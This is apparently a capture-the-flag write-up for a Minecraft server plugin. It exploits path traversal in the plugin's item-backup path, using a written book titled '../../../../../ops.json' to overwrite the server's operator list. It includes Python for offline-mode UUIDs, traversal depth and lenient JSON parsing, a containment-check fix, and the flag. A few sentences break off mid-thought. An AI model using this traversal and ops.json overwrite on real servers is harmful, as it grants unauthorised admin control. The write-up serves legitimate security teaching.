We are given a vanilla Minecraft 1.21.10 server with one plugin jar:
path-of-the-blacksmith/
backup_manager-0.1.jar
Decompiling the plugin with CFR gives the interesting classes:
java -jar cfr.jar path-of-the-blacksmith/backup_manager-0.1.jar --outputdir src
Processing dev.dimu.backup_manager.BackupCommand
Processing dev.dimu.backup_manager.BackupManager
Processing dev.dimu.backup_manager.BackupManagerListener
Processing dev.dimu.backup_manager.FlagCommand
The goal is to become an operator and then run /flag.
The bug is in the code that builds the backup file path for an item:
String itemPath = slotPath + amount + "#" + key;   // amount and key come from the item stack
fullPath = itemPath + "#" + name;                   // name is the item's title / display name
file = new File((String)fullPath).getCanonicalFile();
There is no sanitization of key or name before the path is resolved with getCanonicalFile(), so a name containing ../ walks out of the slot directory.
One small detail matters. For the path
inventory_backups/<uuid>/0/1#written_book#../../../../../ops.json
the first .. is glued to 1#written_book# and is therefore an ordinary directory name, not a parent reference. getCanonicalFile() resolves the components like this:
inventory_backups/<uuid>/0/ -> /app/inventory_backups/<uuid>/0/
1#written_book#.. -> literal directory component
.. -> /app/inventory_backups/<uuid>/0
.. -> /app/inventory_backups/<uuid>
.. -> /app/inventory_backups
.. -> /app
ops.json -> /app/ops.json
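To see that resolution in code, here is an added Python example (not part of the plugin or the original writeup) that rebuilds the path the same way as the decompiled snippet and normalises it lexically with posixpath.normpath, which matches getCanonicalFile() here as long as no symlinks are involved (an assumption). It also computes how many .. a title needs for a given slot directory, showing the off-by-one from the glued component, and shows the check the plugin should have made: canonicalise the slot directory and refuse any file that does not stay inside it. APP_ROOT, the slot layout and the placeholder UUID are constructed values taken from the path above.

```python
import posixpath

# Constructed values: the server root and slot layout seen in the writeup.
APP_ROOT = "/app"


def slot_path(player_uuid: str, slot: int) -> str:
    """/app/inventory_backups/<uuid>/<slot>/ as used by the plugin."""
    return f"{APP_ROOT}/inventory_backups/{player_uuid}/{slot}/"


def backup_path_vulnerable(slot_dir: str, amount: int, key: str, name: str) -> str:
    """Mirrors the decompiled code: slotPath + amount + "#" + key + "#" + name,
    then canonicalised. Lexical normalisation stands in for getCanonicalFile()."""
    item_path = slot_dir + str(amount) + "#" + key
    full_path = item_path + "#" + name
    return posixpath.normpath(full_path)


def backup_path_hardened(slot_dir: str, amount: int, key: str, name: str) -> str:
    """Same construction, but rejects anything that resolves outside the slot directory.
    commonpath compares whole components, so /app/inventory_backups-x does not
    pass as being under /app/inventory_backups."""
    resolved = backup_path_vulnerable(slot_dir, amount, key, name)
    slot_canon = posixpath.normpath(slot_dir)
    if posixpath.commonpath([slot_canon, resolved]) != slot_canon:
        raise ValueError(f"path escapes slot directory: {resolved}")
    return resolved


def title_for_target(slot_dir: str, target_rel_to_root: str) -> str:
    """Book title that makes the backup land at APP_ROOT/<target>.
    depth '..' leave the slot directory, one more pops the literal
    '<amount>#<key>#..' component, and one more is swallowed into that
    component because it is glued to the prefix."""
    rel = posixpath.relpath(posixpath.normpath(slot_dir), APP_ROOT)
    depth = len(rel.split("/"))
    return "../" * (depth + 2) + target_rel_to_root


if __name__ == "__main__":
    slot = slot_path("00000000-0000-3000-8000-000000000000", 0)  # placeholder UUID
    title = title_for_target(slot, "ops.json")
    print(title)                                                   # ../../../../../ops.json
    print(backup_path_vulnerable(slot, 1, "written_book", title))  # /app/ops.json
    try:
        backup_path_hardened(slot, 1, "written_book", title)
    except ValueError as e:
        print("blocked:", e)
```

Note that the containment check is what matters, not a blacklist of ".." in the title: a title with one .. too few still resolves inside /app/inventory_backups, and the hardened version accepts exactly the paths whose canonical form starts with the canonical slot directory.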
This is a write primitive, not a useful restore primitive. The backup file is written outside the slot directory, but
Minecraft stores operators in ops.json in the server root, which is /app/ops.json here.
The plugin helpfully gives every joining player the permission
Entries in ops.json are keyed by UUID. For an offline-mode player the UUID is derived from the name, the same way Java's UUID.nameUUIDFromBytes("OfflinePlayer:" + name) does it:
import hashlib
import uuid

name = "YourName"
# MD5 of "OfflinePlayer:<name>", then force the version/variant bits of a v3 UUID
h = hashlib.md5(("OfflinePlayer:" + name).encode()).digest()
ba = bytearray(h)
ba[6] = (ba[6] & 0x0f) | 0x30  # version 3 (name-based, MD5)
ba[8] = (ba[8] & 0x3f) | 0x80  # RFC 4122 variant
print(uuid.UUID(bytes=bytes(ba)))
Now we craft a written book with the title:
../../../../../ops.json
and the first page containing our operator entry:
[{"uuid":"<YOUR_UUID>","name":"<YOUR_NAME>","level":4,"bypassesPlayerLimit":false}]
In game, this can be done by placing the JSON on the first page and renaming the signed book to the traversal path.


After running the backup command, ops.json contains:
//1##
[{"uuid":"...","name":"...","level":4,"bypassesPlayerLimit":false}]
That prefix looks annoying, but Minecraft reads ops.json with a lenient Gson parser, which treats // up to the end of the line as a comment, so only the array on the second line counts.
Then we restart the server so that ops.json is reloaded:
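As an added check that is not part of the original writeup, the following Python builds the ops.json entry for a name exactly as above (reusing the offline-UUID computation) and then parses the observed file content the way a comment-tolerant JSON reader would. The comment stripper is a minimal stand-in for Gson's lenient mode (only // line comments outside string literals; this is an assumption about the server's parser, not Gson itself), and OBSERVED is a constructed copy of the file as seen after the backup command.

```python
import hashlib
import json
import uuid


def offline_uuid(name: str) -> uuid.UUID:
    """Java's UUID.nameUUIDFromBytes("OfflinePlayer:" + name): MD5 with v3/RFC 4122 bits."""
    h = bytearray(hashlib.md5(("OfflinePlayer:" + name).encode()).digest())
    h[6] = (h[6] & 0x0F) | 0x30
    h[8] = (h[8] & 0x3F) | 0x80
    return uuid.UUID(bytes=bytes(h))


def ops_entry(name: str, level: int = 4) -> str:
    """The single-line JSON array that goes on the book's first page."""
    return json.dumps(
        [{"uuid": str(offline_uuid(name)), "name": name,
          "level": level, "bypassesPlayerLimit": False}],
        separators=(",", ":"),
    )


def strip_line_comments(text: str) -> str:
    """Drop // comments outside string literals (minimal model of a lenient reader)."""
    out, i, in_str = [], 0, False
    while i < len(text):
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < len(text):   # keep escaped char, e.g. \"
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):            # skip to end of line
            nl = text.find("\n", i)
            i = len(text) if nl == -1 else nl
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def parse_ops(file_text: str) -> list:
    """ops.json as the server would see it after comment stripping."""
    return json.loads(strip_line_comments(file_text))


def is_op(file_text: str, name: str, level: int = 4) -> bool:
    """Does the file grant `name` (matched by offline UUID) at least `level`?"""
    want = str(offline_uuid(name))
    return any(e.get("uuid") == want and e.get("level", 0) >= level
               for e in parse_ops(file_text))


# Constructed: the junk header line the plugin wrote, followed by our page.
OBSERVED = "//1##\n" + ops_entry("YourName")

if __name__ == "__main__":
    print(ops_entry("YourName"))
    print(parse_ops(OBSERVED))
    print(is_op(OBSERVED, "YourName"))
```

The entry is matched on the UUID, not the name, which is why the offline UUID has to be right: a correct name with a wrong UUID is not an operator.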
/restart
After reconnecting, the player is OP and can run:
/flag

The flag is:
CSCG{I_b37_Y0u_d1dn7_4ctu4lly_3xpEct_m1n3cr4f7}